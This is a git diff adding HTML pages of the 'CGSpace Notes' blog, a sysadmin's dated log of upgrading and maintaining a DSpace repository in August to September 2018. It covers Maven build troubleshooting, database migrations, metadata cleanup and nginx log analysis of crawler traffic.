+<li>Still the <code>mvn package</code> takes forever and essentially hangs on processing the xmlui-mirage2 overlay (though after building all the themes)</li>
+<li>I will try to reduce Tomcat memory from 4608m to 4096m and then retry the <code>mvn package</code> with 1024m of <code>JAVA_OPTS</code> again</li>
+<li>After running the <code>mvn package</code> for the third time and waiting an hour, I attached <code>strace</code> to the Java process and saw that it was indeed reading XMLUI theme data&hellip; so I guess I just need to wait more</li>
+<li>After waiting two hours the maven process completed and installation was successful</li>
+<li>I restarted Tomcat and it seems everything is working well, so I&rsquo;ll merge the pull request and try to schedule the CGSpace upgrade for this coming Sunday, August 26th</li>
+<li>I merged <a href="https://github.com/ilri/DSpace/pull/378">Atmire&rsquo;s pull request</a> into our <code>5_x-dspace-5.8</code> temporary brach and then cherry-picked all the changes from <code>5_x-prod</code> since April, 2018 when that temporary branch was created</li>
+<li>As the branch histories are very different I cannot merge the new 5.8 branch into the current <code>5_x-prod</code> branch</li>
+<li>Instead, I will archive the current <code>5_x-prod</code> DSpace 5.5 branch as <code>5_x-prod-dspace-5.5</code> and then hard reset <code>5_x-prod</code> based on <code>5_x-dspace-5.8</code></li>
+<li>Unfortunately this will mess up the references in pull requests and issues on GitHub</li>
+</ul>
+<h2 id="2018-08-21">2018-08-21</h2>
+<ul>
+<li>Something must have happened, as the <code>mvn package</code> <em>always</em> takes about two hours now, stopping for a very long time near the end at this step:</li>
+</ul>
+<pre tabindex="0"><code>[INFO] Processing overlay [ id org.dspace.modules:xmlui-mirage2]
+</code></pre><ul>
+<li>It&rsquo;s the same on DSpace Test, my local laptop, and CGSpace&hellip;</li>
+<li>It wasn&rsquo;t this way before when I was constantly building the previous 5.8 branch with Atmire patches&hellip;</li>
+<li>I will restore the previous <code>5_x-dspace-5.8</code> and <code>atmire-module-upgrades-5.8</code> branches to see if the build time is different there</li>
+<li>&hellip; it seems that the <code>atmire-module-upgrades-5.8</code> branch still takes 1 hour and 23 minutes on my local machine&hellip;</li>
+<li>Let me try to build the old <code>5_x-prod-dspace-5.5</code> branch on my local machine and see how long it takes</li>
+<li>That one only took 13 minutes! So there is definitely something wrong with our 5.8 branch, now I should try vanilla DSpace 5.8</li>
+<li>I notice that the step this pauses at is:</li>
+</ul>
+<pre tabindex="0"><code>[INFO] --- maven-war-plugin:2.4:war (default-war) @ xmlui ---
+</code></pre><ul>
+<li>And I notice that Atmire changed something in the XMLUI module&rsquo;s <code>pom.xml</code> as part of the DSpace 5.8 changes, specifically to remove the exclude for <code>node_modules</code> in the <code>maven-war-plugin</code> step</li>
+<li>This exclude is <em>present</em> in vanilla DSpace, and if I add it back the build time goes from 1 hour 23 minutes to 12 minutes!</li>
+<li>It makes sense that it would take longer to complete this step because the <code>node_modules</code> folder has tens of thousands of files, and we have 27 themes!</li>
+<li>I need to test to see if this has any side effects when deployed&hellip;</li>
+<li>In other news, I see there was a pull request in DSpace 5.9 that fixes the issue with not being able to have blank lines in CSVs when importing via command line or webui (<a href="https://jira.duraspace.org/browse/DS-3245">DS-3245</a>)</li>
+</ul>
+<h2 id="2018-08-23">2018-08-23</h2>
+<ul>
+<li>Skype meeting with CKM people to meet new web dev guy Tariku</li>
+<li>They say they want to start working on the ContentDM harvester middleware again</li>
+<li>I sent a list of the top 1500 author affiliations on CGSpace to CodeObia so we can compare ours with the ones on MELSpace</li>
+<li>Discuss CTA items with Sisay, he was trying to figure out how to do the collection mapping in combination with SAFBuilder</li>
+<li>It appears that the web UI&rsquo;s upload interface <em>requires</em> you to specify the collection, whereas the CLI interface allows you to omit the collection command line flag and defer to the <code>collections</code> file inside each item in the bundle</li>
+<li>I imported the CTA items on CGSpace for Sisay:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace import -a -e s.webshet@cgiar.org -s /home/swebshet/ictupdates_uploads_August_21 -m /tmp/2018-08-23-cta-ictupdates.map
+</code></pre><h2 id="2018-08-26">2018-08-26</h2>
+<ul>
+<li>Doing the DSpace 5.8 upgrade on CGSpace (linode18)</li>
+<li>I already finished the Maven build, now I&rsquo;ll take a backup of the PostgreSQL database and do a database cleanup just in case:</li>
+</ul>
+<pre tabindex="0"><code>$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-08-26-before-dspace-58.backup dspace
+$ dspace cleanup -v
+</code></pre><ul>
+<li>Now I can stop Tomcat and do the install:</li>
+</ul>
+<pre tabindex="0"><code>$ cd dspace/target/dspace-installer
+$ ant update clean_backups update_geolite
+</code></pre><ul>
+<li>After the successful Ant update I can run the database migrations:</li>
+</ul>
+<pre tabindex="0"><code>$ psql dspace dspace
+
+dspace=&gt; \i /tmp/Atmire-DSpace-5.8-Schema-Migration.sql 
+DELETE 0
+UPDATE 1
+DELETE 1
+dspace=&gt; \q
+
+$ dspace database migrate ignored
+</code></pre><ul>
+<li>Then I&rsquo;ll run all system updates and reboot the server:</li>
+</ul>
+<pre tabindex="0"><code>$ sudo su -
+# apt update &amp;&amp; apt full-upgrade
+# apt clean &amp;&amp; apt autoclean &amp;&amp; apt autoremove
+# reboot
+</code></pre><ul>
+<li>After reboot I logged in and cleared all the XMLUI caches and everything looked to be working fine</li>
+<li>Adam from WLE had asked a few weeks ago about getting the metadata for a bunch of items related to gender from 2013 until now</li>
+<li>They want a CSV with <em>all</em> metadata, which the Atmire Listings and Reports module can&rsquo;t do</li>
+<li>I exported a list of items from Listings and Reports with the following criteria: from year 2013 until now, have WLE subject <code>GENDER</code> or <code>GENDER POVERTY AND INSTITUTIONS</code>, and CRP <code>Water, Land and Ecosystems</code></li>
+<li>Then I extracted the Handle links from the report so I could export each item&rsquo;s metadata as CSV</li>
+</ul>
+<pre tabindex="0"><code>$ grep -o -E &#34;[0-9]{5}/[0-9]{0,5}&#34; listings-export.txt &gt; /tmp/iwmi-gender-items.txt
+</code></pre><ul>
+<li>Then on the DSpace server I exported the metadata for each item one by one:</li>
+</ul>
+<pre tabindex="0"><code>$ while read -r line; do dspace metadata-export -f &#34;/tmp/${line/\//-}.csv&#34; -i $line; sleep 2; done &lt; /tmp/iwmi-gender-items.txt
+</code></pre><ul>
+<li>But from here I realized that each of the fifty-nine items will have different columns in their CSVs, making it difficult to combine them</li>
+<li>I&rsquo;m not sure how to proceed without writing some script to parse and join the CSVs, and I don&rsquo;t think it&rsquo;s worth my time</li>
+<li>I tested DSpace 5.8 in Tomcat 8.5.32 and it seems to work now, so I&rsquo;m not sure why I got those errors last time I tried</li>
+<li>It could have been a configuration issue, though, as I also reconciled the <code>server.xml</code> with the one in <a href="https://github.com/ilri/rmg-ansible-public">our Ansible infrastructure scripts</a></li>
+<li>But now I can start testing and preparing to move DSpace Test to Ubuntu 18.04 + Tomcat 8.5 + OpenJDK + PostgreSQL 9.6&hellip;</li>
+<li>Actually, upon closer inspection, it seems that when you try to go to Listings and Reports under Tomcat 8.5.33 you are taken to the JSPUI login page despite having already logged in in XMLUI</li>
+<li>If I type my username and password again it <em>does</em> take me to Listings and Reports, though&hellip;</li>
+<li>I don&rsquo;t see anything interesting in the Catalina or DSpace logs, so I might have to file a bug with Atmire</li>
+<li>For what it&rsquo;s worth, the Content and Usage (CUA) module does load, though I can&rsquo;t seem to get any results in the graph</li>
+<li>I just checked to see if the Listings and Reports issue with using the CGSpace citation field was fixed as planned alongside the DSpace 5.8 upgrades (<a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=589">#589</a></li>
+<li>I was able to create a new layout containing only the citation field, so I closed the ticket</li>
+</ul>
+<h2 id="2018-08-29">2018-08-29</h2>
+<ul>
+<li>Discuss <a href="https://copo-project.org/copo/">COPO</a> with Martin Mueller</li>
+<li>He and the consortium&rsquo;s idea is to use this for metadata annotation (submission?) to all repositories</li>
+<li>It is somehow related to adding events as items in the repository, and then linking related papers, presentations, etc to the event item using <code>dc.relation</code>, etc.</li>
+<li>Discuss Linode server charges with Abenet, apparently we want to start charging these to Big Data</li>
+</ul>
+<h2 id="2018-08-30">2018-08-30</h2>
+<ul>
+<li>I fixed the graphical glitch in the cookieconsent popup (the dismiss bug is still there) by pinning the last known good version (3.0.6) in <code>bower.json</code> of each XMLUI theme</li>
+<li>I guess cookieconsent got updated without me realizing it and the previous expression <code>^3.0.6</code> make bower install version 3.1.0</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2018-09/index.html b/docs/2018-09/index.html
new file mode 100644
index 000000000..cafdb1aa2
--- /dev/null
+++ b/docs/2018-09/index.html
@@ -0,0 +1,802 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="September, 2018" />
+<meta property="og:description" content="2018-09-02
+
+New PostgreSQL JDBC driver version 42.2.5
+I&rsquo;ll update the DSpace role in our Ansible infrastructure playbooks and run the updated playbooks on CGSpace and DSpace Test
+Also, I&rsquo;ll re-run the postgresql tasks because the custom PostgreSQL variables are dynamic according to the system&rsquo;s RAM, and we never re-ran them after migrating to larger Linodes last month
+I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I&rsquo;m getting those autowire errors in Tomcat 8.5.30 again:
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2018-09/" />
+<meta property="article:published_time" content="2018-09-02T09:55:54+03:00" />
+<meta property="article:modified_time" content="2020-04-13T15:30:24+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="September, 2018"/>
+<meta name="twitter:description" content="2018-09-02
+
+New PostgreSQL JDBC driver version 42.2.5
+I&rsquo;ll update the DSpace role in our Ansible infrastructure playbooks and run the updated playbooks on CGSpace and DSpace Test
+Also, I&rsquo;ll re-run the postgresql tasks because the custom PostgreSQL variables are dynamic according to the system&rsquo;s RAM, and we never re-ran them after migrating to larger Linodes last month
+I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I&rsquo;m getting those autowire errors in Tomcat 8.5.30 again:
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "September, 2018",
+  "url": "https://alanorth.github.io/cgspace-notes/2018-09/",
+  "wordCount": "5246",
+  "datePublished": "2018-09-02T09:55:54+03:00",
+  "dateModified": "2020-04-13T15:30:24+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2018-09/">
+
+    <title>September, 2018 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-09/">September, 2018</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2018-09-02T09:55:54+03:00">Sun Sep 02, 2018</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-09-02">2018-09-02</h2>
+<ul>
+<li>New <a href="https://jdbc.postgresql.org/documentation/changelog.html#version_42.2.5">PostgreSQL JDBC driver version 42.2.5</a></li>
+<li>I&rsquo;ll update the DSpace role in our <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a> and run the updated playbooks on CGSpace and DSpace Test</li>
+<li>Also, I&rsquo;ll re-run the <code>postgresql</code> tasks because the custom PostgreSQL variables are dynamic according to the system&rsquo;s RAM, and we never re-ran them after migrating to larger Linodes last month</li>
+<li>I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I&rsquo;m getting those autowire errors in Tomcat 8.5.30 again:</li>
+</ul>
+<pre tabindex="0"><code>02-Sep-2018 11:18:52.678 SEVERE [localhost-startStop-1] org.apache.catalina.core.StandardContext.listenerStart Exception sending context initialized event to listener instance of class [org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener]
+ java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;conversionService&#39; defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2&#39; of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property &#39;converters&#39; with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
+    at org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener.contextInitialized(DSpaceKernelServletContextListener.java:92)
+    at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4776)
+    at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5240)
+    at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:150)
+    at org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase.java:754)
+    at org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:730)
+    at org.apache.catalina.core.StandardHost.addChild(StandardHost.java:734)
+    at org.apache.catalina.startup.HostConfig.deployDescriptor(HostConfig.java:629)
+    at org.apache.catalina.startup.HostConfig$DeployDescriptor.run(HostConfig.java:1838)
+    at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
+    at java.util.concurrent.FutureTask.run(FutureTask.java:266)
+    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+    at java.lang.Thread.run(Thread.java:748)
+Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;conversionService&#39; defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2&#39; of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property &#39;converters&#39; with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations:
+</code></pre><ul>
+<li>Full log here: <a href="https://gist.github.com/alanorth/1e4ae567b853fea9d9dbf1a030ecd8c2">https://gist.github.com/alanorth/1e4ae567b853fea9d9dbf1a030ecd8c2</a></li>
+<li>XMLUI fails to load, but the REST, SOLR, JSPUI, etc work</li>
+<li>The old <code>5_x-prod-dspace-5.5</code> branch does work in Ubuntu 18.04 with Tomcat 8.5.30-1ubuntu1.4, however!</li>
+<li>And the <code>5_x-prod</code> DSpace 5.8 branch does work in Tomcat 8.5.x on my Arch Linux laptop&hellip;</li>
+<li>I&rsquo;m not sure where the issue is then!</li>
+</ul>
+<h2 id="2018-09-03">2018-09-03</h2>
+<ul>
+<li>Abenet says she&rsquo;s getting three emails about periodic statistics reports every day since the DSpace 5.8 upgrade last week</li>
+<li>They are from the CUA module</li>
+<li>Two of them have &ldquo;no data&rdquo; and one has a &ldquo;null&rdquo; title</li>
+<li>The last one is a report of the top downloaded items, and includes a graph</li>
+<li>She will try to click the &ldquo;Unsubscribe&rdquo; link in the first two to see if it works, otherwise we should contact Atmire</li>
+<li>The only one she remembers subscribing to is the top downloads one</li>
+</ul>
+<h2 id="2018-09-04">2018-09-04</h2>
+<ul>
+<li>I&rsquo;m looking over the latest round of IITA records from Sisay: <a href="https://dspacetest.cgiar.org/handle/10568/104230">Mercy1806_August_29</a>
+<ul>
+<li>All fields are split with multiple columns like <code>cg.authorship.types</code> and <code>cg.authorship.types[]</code></li>
+<li>This makes it super annoying to do the checks and cleanup, so I will merge them (also time consuming)</li>
+<li>Five items had <code>dc.date.issued</code> values like <code>2013-5</code> so I corrected them to be <code>2013-05</code></li>
+<li>Several metadata fields had values with newlines in them (even in some titles!), which I fixed by trimming the consecutive whitespaces in Open Refine</li>
+<li>Many (91!) items from before 2011 are indicated as having a CRP, but CRPs didn&rsquo;t exist then so this is impossible
+<ul>
+<li>I got all items that were from 2011 and onwards using a custom facet with this GREL on the <code>dc.date.issued</code> column: <code>isNotNull(value.match(/201[1-8].*/))</code> and then blanking their CRPs</li>
+</ul>
+</li>
+<li>Some affiliations with only one separator (|) for multiple values</li>
+<li>I replaced smart quotes like <code>’</code> with plain ones</li>
+<li>Some inconsistencies in <code>cg.subject.iita</code> like COWPEA and COWPEAS, and YAM and YAMS, etc, as well as some spelling mistakes like IMPACT ASSESSMENTN</li>
+<li>Some values in the <code>dc.identifier.isbn</code> are actually ISSNs so I moved them to the <code>dc.identifier.issn</code> column</li>
+<li>I found one invalid ISSN using a custom text facet with the regex from the <a href="https://en.wikipedia.org/wiki/International_Standard_Serial_Number#Code_format">ISSN page on Wikipedia</a>: <code>isNotBlank(value.match(/^\d{4}-\d{3}[\dxX]$/))</code></li>
+<li>One invalid value for <code>dc.type</code></li>
+</ul>
+</li>
+<li>Abenet says she hasn&rsquo;t received any more subscription emails from the CUA module since she unsubscribed yesterday, so I think we don&rsquo;t need create an issue on Atmire&rsquo;s bug tracker anymore</li>
+</ul>
+<h2 id="2018-09-10">2018-09-10</h2>
+<ul>
+<li>Playing with <a href="https://github.com/eykhagen/strest">strest</a> to test the DSpace REST API programatically</li>
+<li>For example, given this <code>test.yaml</code>:</li>
+</ul>
+<pre tabindex="0"><code>version: 1
+
+requests:
+  test:
+    method: GET
+    url: https://dspacetest.cgiar.org/rest/test
+    validate:
+      raw: &#34;REST api is running.&#34;
+
+  login:
+    url: https://dspacetest.cgiar.org/rest/login
+    method: POST
+    data:
+      json: {&#34;email&#34;:&#34;test@dspace&#34;,&#34;password&#34;:&#34;thepass&#34;}
+
+  status:
+    url: https://dspacetest.cgiar.org/rest/status
+    method: GET
+    headers:
+      rest-dspace-token: Value(login)
+
+  logout:
+    url: https://dspacetest.cgiar.org/rest/logout
+    method: POST
+    headers:
+      rest-dspace-token: Value(login)
+
+# vim: set sw=2 ts=2:
+</code></pre><ul>
+<li>Works pretty well, though the DSpace <code>logout</code> always returns an HTTP 415 error for some reason</li>
+<li>We could eventually use this to test sanity of the API for creating collections etc</li>
+<li>A user is getting an error in her workflow:</li>
+</ul>
+<pre tabindex="0"><code>2018-09-10 07:26:35,551 ERROR org.dspace.submit.step.CompleteStep @ Caught exception in submission step: 
+org.dspace.authorize.AuthorizeException: Authorization denied for action WORKFLOW_STEP_1 on COLLECTION:2 by user 3819
+</code></pre><ul>
+<li>Seems to be during submit step, because it&rsquo;s workflow step 1&hellip;?</li>
+<li>Move some top-level CRP communities to be below the new <a href="https://cgspace.cgiar.org/handle/10568/97114">CGIAR Research Programs and Platforms</a> community:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace community-filiator --set -p 10568/97114 -c 10568/51670
+$ dspace community-filiator --set -p 10568/97114 -c 10568/35409
+$ dspace community-filiator --set -p 10568/97114 -c 10568/3112
+</code></pre><ul>
+<li>Valerio contacted me to point out some issues with metadata on CGSpace, which I corrected in PostgreSQL:</li>
+</ul>
+<pre tabindex="0"><code>update metadatavalue set text_value=&#39;ISI Journal&#39; where resource_type_id=2 and metadata_field_id=226 and text_value=&#39;ISI Juornal&#39;;
+UPDATE 1
+update metadatavalue set text_value=&#39;ISI Journal&#39; where resource_type_id=2 and metadata_field_id=226 and text_value=&#39;ISI journal&#39;;
+UPDATE 23
+update metadatavalue set text_value=&#39;ISI Journal&#39; where resource_type_id=2 and metadata_field_id=226 and text_value=&#39;YES&#39;;
+UPDATE 1
+delete from metadatavalue where resource_type_id=2 and metadata_field_id=226 and text_value=&#39;NO&#39;;
+DELETE 17
+update metadatavalue set text_value=&#39;ISI Journal&#39; where resource_type_id=2 and metadata_field_id=226 and text_value=&#39;ISI&#39;;
+UPDATE 15
+</code></pre><ul>
+<li>Start working on adding metadata for access and usage rights that we started earlier in 2018 (and also in 2017)</li>
+<li>The current <code>cg.identifier.status</code> field will become &ldquo;Access rights&rdquo; and <code>dc.rights</code> will become &ldquo;Usage rights&rdquo;</li>
+<li>I have some work in progress on the <a href="https://github.com/alanorth/DSpace/tree/5_x-rights"><code>5_x-rights</code> branch</a></li>
+<li>Linode said that CGSpace (linode18) had a high CPU load earlier today</li>
+<li>When I looked, I see it&rsquo;s the same Russian IP that I noticed last month:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;10/Sep/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+   1459 157.55.39.202
+   1579 95.108.181.88
+   1615 157.55.39.147
+   1714 66.249.64.91
+   1924 50.116.102.77
+   3696 157.55.39.106
+   3763 157.55.39.148
+   4470 70.32.83.92
+   4724 35.237.175.180
+  14132 5.9.6.51
+</code></pre><ul>
+<li>And this bot is still creating more Tomcat sessions than Nginx requests (WTF?):</li>
+</ul>
+<pre tabindex="0"><code># grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51&#39; dspace.log.2018-09-10 
+14133
+</code></pre><ul>
+<li>The user agent is still the same:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)
+</code></pre><ul>
+<li>I added <code>.*crawl.*</code> to the Tomcat Session Crawler Manager Valve, so I&rsquo;m not sure why the bot is creating so many sessions&hellip;</li>
+<li>I just tested that user agent on CGSpace and it <em>does not</em> create a new session:</li>
+</ul>
+<pre tabindex="0"><code>$ http --print Hh https://cgspace.cgiar.org &#39;User-Agent:Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&#39;
+GET / HTTP/1.1
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Host: cgspace.cgiar.org
+User-Agent: Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)
+
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Encoding: gzip
+Content-Language: en-US
+Content-Type: text/html;charset=utf-8
+Date: Mon, 10 Sep 2018 20:43:04 GMT
+Server: nginx
+Strict-Transport-Security: max-age=15768000
+Transfer-Encoding: chunked
+Vary: Accept-Encoding
+X-Cocoon-Version: 2.2.0
+X-Content-Type-Options: nosniff
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+</code></pre><ul>
+<li>I will have to keep an eye on it and perhaps add it to the list of &ldquo;bad bots&rdquo; that get rate limited</li>
+</ul>
+<h2 id="2018-09-12">2018-09-12</h2>
+<ul>
+<li>Merge AReS explorer changes to nginx config and deploy on CGSpace so CodeObia can start testing more</li>
+<li>Re-create my local Docker container for PostgreSQL data, but using a volume for the database data:</li>
+</ul>
+<pre tabindex="0"><code>$ sudo docker volume create --name dspacetest_data
+$ sudo docker run --name dspacedb -v dspacetest_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+</code></pre><ul>
+<li>Sisay is still having problems with the controlled vocabulary for top authors</li>
+<li>I took a look at the submission template and Firefox complains that the XML file is missing a root element</li>
+<li>I guess it&rsquo;s because Firefox is receiving an empty XML file</li>
+<li>I told Sisay to run the XML file through tidy</li>
+<li>More testing of the access and usage rights changes</li>
+</ul>
+<h2 id="2018-09-13">2018-09-13</h2>
+<ul>
+<li>Peter was communicating with Altmetric about the OAI mapping issue for item <a href="https://cgspace.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/82810">10568/82810</a> again</li>
+<li>Altmetric said it was somehow related to the OAI <code>dateStamp</code> not getting updated when the mappings changed, but I said that back in <a href="/cgspace-notes/2018-07/">2018-07</a> when this happened it was because the OAI was actually just not reflecting all the item&rsquo;s mappings</li>
+<li>After forcing a complete re-indexing of OAI the mappings were fine</li>
+<li>The <code>dateStamp</code> is most probably only updated when the item&rsquo;s metadata changes, not its mappings, so if Altmetric is relying on that we&rsquo;re in a tricky spot</li>
+<li>We need to make sure that our OAI isn&rsquo;t publicizing stale data&hellip; I was going to post something on the dspace-tech mailing list, but never did</li>
+<li>Linode says that CGSpace (linode18) has had high CPU for the past two hours</li>
+<li>The top IP addresses today are:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &#34;13/Sep/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10                                                                                                
+     32 46.229.161.131
+     38 104.198.9.108
+     39 66.249.64.91
+     56 157.55.39.224
+     57 207.46.13.49
+     58 40.77.167.120
+     78 169.255.105.46
+    702 54.214.112.202
+   1840 50.116.102.77
+   4469 70.32.83.92
+</code></pre><ul>
+<li>And the top two addresses seem to be re-using their Tomcat sessions properly:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=70.32.83.92&#39; dspace.log.2018-09-13 | sort | uniq
+7
+$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77&#39; dspace.log.2018-09-13 | sort | uniq
+2
+</code></pre><ul>
+<li>So I&rsquo;m not sure what&rsquo;s going on</li>
+<li>Valerio asked me if there&rsquo;s a way to get the page views and downloads from CGSpace</li>
+<li>I said no, but that we might be able to piggyback on the Atmire statlet REST API</li>
